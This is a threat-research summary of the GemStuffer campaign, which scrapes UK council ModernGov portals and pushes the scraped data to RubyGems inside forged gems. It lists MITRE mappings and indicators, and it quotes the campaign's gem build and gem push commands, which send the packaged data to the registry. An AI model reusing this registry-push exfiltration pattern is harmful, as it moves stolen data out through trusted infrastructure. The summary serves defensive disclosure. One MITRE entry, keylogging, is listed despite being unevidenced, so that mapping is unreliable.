Threat Research

GemStuffer Campaign Abuses RubyGems as Exfiltration Channel Targeting UK Local Government

SocketDev
GemStuffer Campaign Abuses RubyGems as Exfiltration Channel Targeting UK Local Government
Socket’s threat research team is tracking GemStuffer, a suspicious RubyGems campaign that uses public UK council ModernGov portals as a data transport layer and republishes scraped content inside more than 100 forged gems. The activity overlaps with a broader RubyGems spam-publishing incident and involves hardcoded API keys, temporary credential injection, and direct pushes to rubygems.org. #GemStuffer #RubyGems #ModernGov #Lambeth #Wandsworth #Southwark

Keypoints

  • GemStuffer involves 155 package artifacts, with more than 100 RubyGems packages and versions used in the campaign.
  • The packages scrape public council portal content from ModernGov sites used by Lambeth, Wandsworth, and Southwark.
  • Collected responses are packaged into valid .gem archives and published back to RubyGems, effectively using the registry as a storage and transport layer.
  • Some samples build gems locally under /tmp, inject fabricated RubyGems credentials, and push via the gem CLI; others POST archives directly to the RubyGems API.
  • Ruby Central described the wider activity as a coordinated spam-publishing campaign tied to newly registered accounts, with no compromise of existing packages.
  • RubyGems temporarily disabled new account registration and throttled webhooks while improving spam detection; existing accounts and installs were unaffected.
  • The observed abuse pattern includes low download counts, repetitive package generation, hardcoded API keys, and scraped data embedded inside package archives.

MITRE Techniques

  • [T1589.002 ] Gather Victim Identity Information: Organizational – The scripts enumerate UK local government portals and collect council meeting content from Lambeth, Wandsworth, and Southwark. [‘The campaign focuses on public-facing ModernGov portals used by Lambeth, Wandsworth, and Southwark’]
  • [T1213 ] Data from Information Repositories – The malware scrapes public council calendar pages, agenda listings, committee links, and related meeting content from web portals. [‘It fetches council calendar pages and then actively crawls extracted links for additional document content’]
  • [T1041 ] Exfiltration Over C2 Channel – Scraped data is embedded into .gem packages and pushed to RubyGems for later retrieval. [‘Wrap it in a package, push it to a public registry, and retrieve it later with ordinary package tooling’]
  • [T1078 ] Valid Accounts – The campaign uses hardcoded RubyGems API keys and fabricated credentials to authenticate publishing actions. [‘Write hardcoded API key → .gem/credentials’, ‘The API key in the Authorization header is the only authentication material in the request’]
  • [T1027 ] Obfuscated Files or Information – The stolen content is stored inside compressed gem archive structures and gzip/tar layers. [‘The data is gzip-compressed inside a tar archive inside a TLS session’]
  • [T1105 ] Ingress Tool Transfer – The attacker transfers packaged data into the RubyGems registry by uploading .gem files. [‘gem push .gem –host https://rubygems.org’]
  • [T1059.004 ] Command and Scripting Interpreter: Unix Shell – The samples use shell-out backticks to execute gem build and gem push commands. [‘gem build x.gemspec’, ‘gem push lambeth71b-0.0.2.gem –host https://rubygems.org’]
  • [T1056.001 ] Input Capture: Keylogging – The article does not describe keylogging; no relevant use of this technique is evidenced. [‘No credential capture from user input is described’]
  • [T1567.002 ] Exfiltration to Cloud Storage – The campaign uses RubyGems as a public storage layer to host stolen data. [‘RubyGems is being used as a public data drop for scraped council content’]

Indicators of Compromise

  • [Domains ] Targeted council portals and registry endpoints – moderngov.lambeth.gov.uk, democracy.wandsworth.gov.uk, and moderngov.southwark.gov.uk
  • [URLs ] Calendar scraping endpoints – https://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?M=1&Y=2026&GL=1&bcr=1, https://democracy.wandsworth.gov.uk/mgCalendarMonthView.aspx?M=1&Y=2026&GL=1&bcr=1
  • [File names ] Malicious package and staging artifacts – payload.rb, script.rb, evil.rb, and lib/result.txt
  • [File paths ] Temporary staging and credential locations – /tmp/gemhome/.gem/credentials, /tmp//lib/result.txt, and /tmp/rubydocran_*
  • [API keys ] RubyGems publishing credentials – rubygems_9feada…[REDACTED]…054a57, rubygems_fb4e1b…[REDACTED]…aec9dd, and rubygems_d8e875…[REDACTED]…03a533
  • [Hashes ] Example file hashes for dropped scripts – payload.rb SHA-256 239440c830e17530dda0a8a06ed2708860998750a1e3ed2239e919465dc59420, script.rb SHA-256 c2d6bcacc88177e0f2c8c262726f86f37e671b1692c8bc135bac4b610ddcf31a
  • [Package names ] Representative malicious gems – lambeth71b, agenda-sample-result, and other repeated junk-like package names

Read more: https://socket.dev/blog/gemstuffer

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint